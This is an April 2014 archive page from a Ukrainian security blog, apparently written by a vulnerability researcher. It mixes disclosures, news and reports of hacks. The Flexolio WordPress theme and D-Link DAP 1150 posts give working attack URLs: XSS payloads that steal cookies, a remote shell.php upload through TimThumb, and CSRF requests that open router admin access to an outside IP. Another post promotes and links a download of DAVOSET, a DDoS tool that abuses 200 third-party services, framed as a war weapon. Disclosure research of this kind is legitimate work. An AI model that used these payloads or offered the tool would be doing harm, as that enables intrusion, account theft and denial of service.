Архів за Квітень, 2014

Численні уразливості в Flexolio для WordPress

23:53 26.04.2014

У квітні, 23.04.2014, я виявив Content Spoofing, Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service та Arbitrary File Upload уразливості в темі Flexolio для WordPress. Вона містить CU3ER і TimThumb.

Content Spoofing (WASC-12):

http://site/wp-content/themes/flexolio/inc/cu3er/cu3er.swf?xml=http://site2/1.xml

1.xml:

cu3er-1.xml

Cross-Site Scripting (WASC-08):

http://site/wp-content/themes/flexolio/inc/cu3er/cu3er.swf?xml=http://site2/xss.xml

xss.xml:

cu3er-2.xml

Для атаки між доменами потрібен crossdomain.xml на сайті з xml-файлами.

Cross-Site Scripting (WASC-08):

http://site/wp-content/themes/flexolio/inc/thumb.php?src=1%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):

http://site/wp-content/themes/flexolio/inc/thumb.php?src=http://

А також Abuse of Functionality і DoS в уразливості в TimThumb та Arbitrary File Upload уразливість, що була оприлюднена через 3,5 місяці після оприлюднення мною попередніх дірок. Вони можливі в старих версіях теми, бо в останніх версіях теми в TimThumb заборонений доступ до зовнішніх сайтів.

Arbitrary File Upload (WASC-31):

http://site/wp-content/themes/flexolio/inc/thumb.php?src=http://site.com/shell.php

Full path disclosure (WASC-13):

FPD в php-файлах шаблону (по замовчуванню) або в error_log. В index.php та інших php-файлах.

http://site/wp-content/themes/flexolio/

Уразливі всі версії теми Flexolio.

Новини: уразливість в OpenSSL, захист браузерів від шкідливого ПЗ і дірявий Android

22:45 26.04.2014

За повідомленням www.opennet.ru, в OpenSSL виявлена критична уразливість, що може привести до витоку закритих ключів.

У OpenSSL виявлена одна із самих серйозних уразливостей (CVE-2014-0160) в історії проекту, що стосується величезного числа сайтів, серверних систем і клієнтських додатків, що використовують OpenSSL 1.0.1 для організації обміну даними через захищене з’єднання. Суть проблеми виявляється в можливості доступу до 64 Кб пам’яті клієнтського чи серверного процесу з яким встановлене шифроване з’єднання.

Практична небезпека уразливості пов’язана з тим, що в підданому витоку області пам’яті можуть розміщатися закриті ключі чи паролі доступу, що потенційно можуть бути витягнуті віддаленим зловмисником. Уразливість має місце в коді реалізації TLS-розширення heartbeat.

За повідомленням threatpost.ru, NSS оцінила браузерний захист від шкідливого ПЗ.

Дослідницька компанія NSS Labs опублікувала результати перевірки ефективності популярних веб-браузерів як засобу захисту від шкідливих програм, розповсюджуваних за допомогою соціальної інженерії. Крім п’яти регулярних учасників експерти випробували також трьох новачків - китайські браузери Kingsoft Liebao, Qihoo 360 Safe Browser і Sogou Explorer.

Кращі результати, як і раніше, продемонстрував Internet Explorer, що лідирував по всіх основних показниках. Ефективність блокування IE під час іспитів у середньому склала 99,9%. На другому місці браузер Liebao, на третьому Google Chrome.

У тестуванні NSS завжди перемагає IE. Результат передбачуваний, як це завжди буває в проплачених Microsoft дослідженнях :-) .

За повідомленням www.opennet.ru, платформа Android уразлива до атаки PileUp.

Дослідники з Індіанського університету і компанії Microsoft опублікували статтю, у якій описали новий клас уразливостей у Package Management Service на платформі Android. Уразливими на даний момент є всі апарати, що працюють під керуванням Android, для яких є оновлення на наступну головну версію, ще не встановлене користувачем.

Суть PileUp уразливості полягає в наступному. Різні версії ОС Android мають різний набір дозволів для додатків і в нових версіях ОС цей набір розширюється. Зловмисник може підготувати додаток, що запитує доступ до привілейованих операцій, що з’явились у свіжій версії платформи.

Також була виявлена небезпечна DoS уразливість в Android 2.3, 4.2.2, 4.3 і можливо інших випусках. Встановлення підготовленого зловмисниками пакета APK може привести до зациклених перезавантажень, що не усуваються, тобто приводить до непрацездатності пристрою до виконання перепрошивання.

DDoS attacks via other sites execution tool

20:14 26.04.2014

Сьогодні вийшла нова версія програми DAVOSET v.1.2. Це Nuclear Edition. В цей день бажаю вам виключно мирного атому.

Враховуючи війну Путіна проти України, армія ботів може стати в нагоді. В новій версії:

  • Додав підтримку Socks проксі.
  • Додав нові сервіси в повний список зомбі.
  • Прибрав неробочий сервіс з повного списку зомбі.

Всього в списку міститься 200 зомбі-сервісів, які готові нанести удар проти диктатури.

DDoS attacks via other sites execution tool (DAVOSET) - це інструмент для використання Abuse of Functionality уразливостей на одних сайтах, для проведення DoS і DDoS атак на інші сайти.

Скачати: DAVOSET_v.1.2.rar.

Добірка уразливостей

17:23 26.04.2014

В даній добірці уразливості в веб додатках:

  • Linksys X3000 - Multiple Vulnerabilities (деталі)
  • Cisco/Linksys E1200 N300 Reflected XSS (деталі)
  • CVE-2013-3568 - Linksys CSRF + Root Command Injection (деталі)
  • LiveZilla 5.1.2.0 Multiple Stored XSS in webbased operator client (деталі)
  • Leed (Light Feed) - Multiple vulnerabilities (деталі)

Численні CSRF та XSS уразливості в D-Link DAP 1150

23:50 25.04.2014

Продовжуючи тему уразливостей в D-Link DAP 1150. Раніше я розповідав про два режими роботи цього пристрою і зараз представляю нові уразливості в режимі роутера. У листопаді, 17.11.2011, я виявив численні Cross-Site Request Forgery та Cross-Site Scripting уразливості в D-Link DAP 1150 (Wi-Fi Access Point and Router).

Уразлива версія D-Link DAP 1150, Firmware version 1.2.94. Дана модель з іншими прошивками також повинна бути вразливою. Компанія D-Link тоді проігнорувала усі уразливості в цьому пристрої й досі їх не виправила.

Нагадаю, що в першому звіті про уразливості в D-Link DAP 1150, я писав про CSRF в формі логіна в адмінку пристрою та інші уразливості, що дозволяють віддалено входити в адмінку для проведення CSRF і XSS атак всередині адмінки.

CSRF (WASC-09):

В розділі Advanced / Device mode через CSRF можна змінювати режим роботи пристрою. Якщо увімкнений режим точки доступу, то для атаки на уразливості в режимі роутера потрібно увімкнути цей режим.

Увімкнути режим точки доступу:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=112&res_struct_size=0&res_buf={%22device_mode%22:%22ap%22}&res_pos=0

Увімкнути режим роутера:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=112&res_struct_size=0&res_buf={%22device_mode%22:%22router%22}&res_pos=0

CSRF (WASC-09):

В розділі Advanced / Remote access через CSRF можна можна додавати, редагувати та видаляти налаштування віддаленого доступу до веб інтерфейсу. Наступний запит дозволить віддалений доступ в адмінку з IP 50.50.50.50.

Додати:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%2250.50.50.50%22,%20%22source_mask%22:%22255.255.255.0%22,%20%22sport%22:80,%20%22dport%22:%2280%22}&res_pos=-1

Редагувати:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%2250.50.50.50%22,%20%22source_mask%22:%22255.255.255.0%22,%20%22sport%22:80,%20%22dport%22:%2280%22}&res_pos=0

Видалити:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=2&res_config_id=16&res_struct_size=0&res_pos=0

XSS (WASC-08):

Це persistent XSS. Код виконається в розділі Advanced / Remote access.

Атака через функцію додавання в параметрі res_buf (в полях: IP address, Mask):

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22source_mask%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22sport%22:80,%20%22dport%22:%2280%22}&res_pos=-1

Атака через функцію редагування в параметрі res_buf (в полях: IP address, Mask):

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22source_mask%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22sport%22:80,%20%22dport%22:%2280%22}&res_pos=0

Квітневі DDoS атаки та взломи

22:47 25.04.2014

Раніше я писав про березневі DDoS атаки в Україні, а зараз розповім про ситуацію в квітні.

В зв’язку з сепаратистськими і терористичними акціями на сході України, в цьому місяці хакерська активність продовжила бути значною. Відбулися наступні DDoS атаки та взломи в Інтернеті.

Проросійськими та іноземними хакерами були атаковані наступні сайти:

DDoS на DNS сервери FREEhost.ua - 01-02.04.2014
DDoS на gp.gov.ua - 04.04.2014 і 09.04.2014
Взломаний vrada.gov.ua - 07.04.2014
Взломаний gp.gov.ua - 09.04.2014
Взломаний pol.gp.gov.ua - 09.04.2014
DDoS на kmu.gov.ua - 10.04.2014 і 14.04.2014

Також на протязі квітня відбулися численні DDoS атаки на російські опозиційні сайти.

Проукраїнськими хакерами були атаковані наступні сайти:

DDoS на www.rada.crimea.ua - 01-30.04.2014 (сайт працював з перервами)
DDoS на www.crimea-portal.gov.ua - 01-30.04.2014
DDoS на www-ki.rada.crimea.ua - 01-30.04.2014 (сайт працював з перервами)

Проукраїнськими хакерами були взломані наступні сайти:

sevispolkom.info - 02.04.2014 - хакери розмістили на сайті номер 565. А потім повністю відібрали сайт, через захоплення домену.

Масовий взлом сайтів на сервері TheHost

20:34 25.04.2014

З 16.01.2012 по 09.04.2014 відбувся масовий взлом сайтів на сервері TheHost. Нещодавно я вже розповідав про інші масові взломи.

Був взломаний сервер компанії TheHost. Дефейс відбулися після згаданого масового взлому сайтів на сервері Delta-X. Взлом складався з багатьох окремих дефейсів. 28 сайтів були дефейснуті в 2012 році, 415 сайтів в 2013 році і 8 сайтів в 2014 році.

Всього було взломано 451 сайтів на сервері української компанії TheHost (IP 91.223.180.100). Перелік сайтів можете подивитися на www.zone-h.org.

Враховуючи велику кількість окремих дефейсів по одному або декілька сайтів, всі вони явно були зроблені при взломах окремих сайтів.

Добірка експлоітів

17:29 25.04.2014

В даній добірці експлоіти в веб додатках:

  • Huawei E5331 MiFi Unauthenticated Access / Setting Manipulation (деталі)
  • ownCloud 4.0.x, 4.5.x (upload.php, filename param) - Remote Code Execution (деталі)
  • Apple TV Touch Password Disclosure Vulnerability (деталі)
  • Java 7 Update 5-10 vulnerability to download and execute (деталі)
  • Java 7 Update 11 vulnerability to download and execute (деталі)

Нові уразливості на privatbank.ua

23:52 24.04.2014

У червні, 23.06.2013, я знайшов нові Cross-Site Scripting та Insufficient Anti-automation уразливості на http://privatbank.ua. За 3 XSS уразливості ПриватБанк мені заплатив (тому про них я деталей не наведу), але досі повністю не виправив. Адміни додали фільтри, але їх потенційно можна обійти - ось тому потрібно якісно виправляти уразливості. А от IAA дірку виправляти не стали.

Стосовно ПриватБанка я вже писав про численні уразливості на www.blog.privatbank.ua та уразливості в LiqPAY для Android та iOS.

Всі уразливості наявні в формі http://privatbank.ua/cpa/credit-card/. Ось інформація про IAA, яку ПриватБанк не захотів виправляти, мотивуючи це тим, що в них капча розробляється, тому всі ці та інші IAA (що я знайшов на privatbank.ua та інших сайтах, а таких дірок я знайшов багато) вони “вважають виправленими”, мовляв капчу зроблять і поставлять на своїх сайтах. При тому, що в деяких формах вже є капча, але вони мовляв роблять нову. Це така відмазка, аби не виправляти дірки на своїх сайтах :-) і не проводити оплату цих дірок.

Insufficient Anti-automation:

В формі http://privatbank.ua/cpa/credit-card/ немає захисту від автоматизованих атак (капчі).

Дана уразливість, як і багато подібних дірок, досі не виправлені.

Квітневий вівторок патчів від Microsoft

22:47 24.04.2014

У квітні місяці Microsoft випустила 4 патчі. Що менше ніж у березні.

У квітневому “вівторку патчів” Microsoft випустила черговий пакет оновлень, до якого увійшло 4 бюлетенів по безпеці. Що закривають численні уразливості в програмних продуктах компанії. Два патчі закривають критичні уразливості та два патчі закривають важливі уразливості.

Дані патчі стосуються всіх поточних операційних систем компанії Microsoft - Windows XP, 2003, Vista, 2008, 7, 2008 R2, 8, 2012, RT, 8.1 та RT 8.1. А також Microsoft Office, Office Services, Office Web Apps та Internet Explorer. Це останній випуск патчів для Windows XP, підтримку якої компанія припинила в цьому місяці.